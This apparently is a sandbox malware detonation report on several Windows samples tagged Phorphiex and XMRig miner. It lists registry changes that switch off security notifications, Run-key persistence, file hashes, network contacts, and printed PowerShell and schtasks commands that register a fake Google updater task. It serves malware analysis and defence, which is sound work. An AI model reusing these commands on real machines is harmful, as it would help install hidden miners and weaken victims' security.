| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\326623531.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe
"C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe"
C:\Windows\wklopsvcs.exe
C:\Windows\wklopsvcs.exe
C:\Users\Admin\AppData\Local\Temp\326623531.exe
C:\Users\Admin\AppData\Local\Temp\326623531.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\640611173.exe
C:\Users\Admin\AppData\Local\Temp\640611173.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
Files
memory/1012-132-0x0000000000000000-mapping.dmp
C:\Windows\wklopsvcs.exe
| MD5 | 209baf40779b80d5e443c3dbbd656bfb |
| SHA1 | b64fa8dded031d5dacac519a2035cefcd05e6503 |
| SHA256 | c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d |
| SHA512 | 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e |
memory/2704-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\326623531.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\640611173.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
Analysis: behavioral19
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe
"C:\Users\Admin\AppData\Local\Temp\fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/1100-54-0x00000000763F1000-0x00000000763F3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\65694274.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2211424843.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winrecsv.exe" | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
| File opened for modification | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\65694274.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\65694274.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe
"C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe"
C:\Windows\winrecsv.exe
C:\Windows\winrecsv.exe
C:\Users\Admin\AppData\Local\Temp\65694274.exe
C:\Users\Admin\AppData\Local\Temp\65694274.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\2211424843.exe
C:\Users\Admin\AppData\Local\Temp\2211424843.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| PK | 39.53.112.230:40500 |  | tcp |
| UZ | 62.209.151.5:40500 |  | udp |
| BY | 87.252.235.64:40500 |  | udp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| IR | 85.185.218.5:40500 |  | udp |
| IR | 94.183.130.203:40500 |  | udp |
| IR | 89.219.213.197:40500 |  | udp |
| SY | 185.199.246.61:40500 |  | tcp |
| UZ | 213.230.109.3:40500 |  | udp |
| IR | 80.191.192.113:40500 |  | udp |
| UZ | 213.230.90.158:40500 |  | udp |
| UZ | 80.80.213.18:40500 |  | udp |
| IR | 2.185.153.12:40500 |  | udp |
| IR | 94.183.170.86:40500 |  | tcp |
| MZ | 197.218.165.129:40500 |  | udp |
| IR | 151.242.96.55:40500 |  | udp |
| DZ | 105.106.149.0:40500 |  | udp |
| UZ | 213.230.111.166:40500 |  | udp |
| UZ | 62.209.138.180:40500 |  | udp |
| AM | 46.130.160.140:40500 |  | tcp |
| IR | 93.117.36.111:40500 |  | udp |
| IR | 46.100.77.114:40500 |  | udp |
| UZ | 213.230.109.3:40500 |  | tcp |
| RU | 45.159.251.68:40500 |  | udp |
| IR | 188.158.137.233:40500 |  | tcp |
| UA | 93.175.220.40:40500 |  | udp |
| VE | 201.243.153.142:40500 |  | udp |
Files
memory/288-54-0x0000000075B11000-0x0000000075B13000-memory.dmp
memory/876-55-0x0000000000000000-mapping.dmp
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
\Users\Admin\AppData\Local\Temp\65694274.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1028-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\65694274.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\65694274.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1028-63-0x000000013F200000-0x000000013F206000-memory.dmp
memory/1028-64-0x000007FEFBC61000-0x000007FEFBC63000-memory.dmp
memory/1516-65-0x0000000000000000-mapping.dmp
memory/1448-66-0x0000000000000000-mapping.dmp
memory/564-67-0x0000000000000000-mapping.dmp
memory/1584-68-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\2211424843.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\2211424843.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/1192-70-0x0000000000000000-mapping.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe
"C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe"
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 3988 -ip 3988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 264
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 |  | tcp |
| US | 93.184.221.240:80 |  | tcp |
| US | 20.189.173.13:443 |  | tcp |
| NL | 87.248.202.1:80 |  | tcp |
| NL | 87.248.202.1:80 |  | tcp |
| NL | 87.248.202.1:80 |  | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/3988-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/4648-135-0x0000000000150000-0x0000000000171000-memory.dmp
memory/3988-136-0x0000000000400000-0x000000000045D000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
151s
Max time network
155s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winopdvcs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2546213664.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3433215875.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winopdvcs.exe" | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2200 set thread context of 3932 | N/A | C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe | C:\Windows\system32\cmd.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\winopdvcs.exe | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
| File created | C:\Windows\winopdvcs.exe | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe
"C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe"
C:\Windows\winopdvcs.exe
C:\Windows\winopdvcs.exe
C:\Users\Admin\AppData\Local\Temp\2546213664.exe
C:\Users\Admin\AppData\Local\Temp\2546213664.exe
C:\Users\Admin\AppData\Local\Temp\3433215875.exe
C:\Users\Admin\AppData\Local\Temp\3433215875.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe mrcpapowlrrgcvjb 6E3sjfZq2rJQaxvLPmXgsEqPiBiBLmVqlQRiqAROwnq+r3PgsvOI5CPEjWBkfjMBWeIX+GdZdCENkRpNNWWuUuiiT0nhr8xABS5D2B/qge2fBy16M7G/el0gdMCErX4jNqcnUz2ARFIRcMCpcOiMWItfgkpYfgbwioV0ioLoGuNMU42qRMuIsqjDs2FXseGAy1L1fh1Re+jaH/pdMkIbkcsE1vSzYIpH8WyjqEMFAlci5CLdLe97i0VD0mpaS+Gd+daXi5rj++LAHgkUTDqtbVL59AFDJZ9WYwE1hVlCLXncC2+//LOROJeHXBaIJ7E+zEF1XB8rOli3v9a2WUYdKol3fQS1Z2oPF18nYGSur3scnVljXe+vL6dRgItNbPO7
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 |  | tcp |
| US | 93.184.220.29:80 |  | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 |  | tcp |
| EG | 154.239.26.183:40500 |  | tcp |
| IR | 128.65.172.104:40500 |  | udp |
| US | 209.197.3.8:80 |  | tcp |
| US | 209.197.3.8:80 |  | tcp |
| YE | 89.189.65.251:40500 |  | udp |
| RU | 5.137.85.248:40500 |  | udp |
| IR | 2.188.244.75:40500 |  | udp |
| IE | 13.69.239.73:443 |  | tcp |
| UZ | 87.237.234.24:40500 |  | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| DZ | 41.104.208.77:40500 |  | udp |
| IR | 185.120.213.67:40500 |  | tcp |
| IR | 46.224.197.251:40500 |  | udp |
| UZ | 192.166.229.136:40500 |  | udp |
| IR | 151.243.153.175:40500 |  | udp |
| US | 209.197.3.8:80 |  | tcp |
| US | 209.197.3.8:80 |  | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| UZ | 213.230.126.64:40500 |  | udp |
| IR | 89.43.220.15:40500 |  | udp |
| IR | 78.39.225.36:40500 |  | tcp |
| IR | 91.185.136.105:40500 |  | udp |
| ID | 36.92.205.197:40500 |  | udp |
| IR | 2.183.186.130:40500 |  | udp |
| RU | 185.215.113.84:5050 |  | tcp |
| AF | 149.54.15.126:40500 |  | udp |
| IR | 2.190.145.188:40500 |  | udp |
| UZ | 217.12.85.22:40500 |  | tcp |
| AO | 155.89.190.204:40500 |  | udp |
| RU | 185.215.113.84:5050 |  | tcp |
| UZ | 87.237.237.23:40500 |  | udp |
| IR | 5.233.167.22:40500 |  | udp |
